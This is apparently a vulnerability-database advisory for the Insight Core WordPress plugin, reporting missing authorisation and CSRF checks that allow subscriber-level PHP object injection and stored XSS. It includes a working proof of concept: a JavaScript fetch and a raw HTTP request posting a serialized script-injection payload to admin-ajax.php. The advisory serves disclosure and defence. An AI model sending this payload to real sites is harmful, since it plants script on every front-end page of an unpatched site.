WordPress Plugin Vulnerabilities
Insight Core <= 1.0 - Subscriber+ PHP Object Injection & Stored XSS
Description
The plugin does not have any authorisation and CSRF checks in the insight_customizer_options_import (available to any authenticated user), does not validate user input before passing it to unserialize(), nor sanitise and escape it before outputting it in the response. As a result, it could allow users with a role as low as Subscriber to perform PHP Object Injection, as well as Stored Cross-Site Scripting attacks
Proof of Concept
let formData = new FormData;
formData.append('import-file', new Blob(['a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";}']))
formData.append('action', 'insight_customizer_options_import');
fetch("https://example.com/wp-admin/admin-ajax.php", {
"body": formData,
"method": "POST"
})
.then(response => response.text())
.then(data => console.log(data));
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------189498983625966260651015514771
Content-Length: 458
Connection: close
Cookie: [any authenticated user]
-----------------------------189498983625966260651015514771
Content-Disposition: form-data; name="import-file"; filename="blob"
Content-Type: application/octet-stream
a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";}
-----------------------------189498983625966260651015514771
Content-Disposition: form-data; name="action"
insight_customizer_options_import
-----------------------------189498983625966260651015514771--
The XSS will be triggered in all frontend pages Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
Timeline
Publicly Published
2021-12-28 (about 9 months ago)
Added
2022-02-15 (about 7 months ago)
Last Updated
2022-04-08 (about 5 months ago)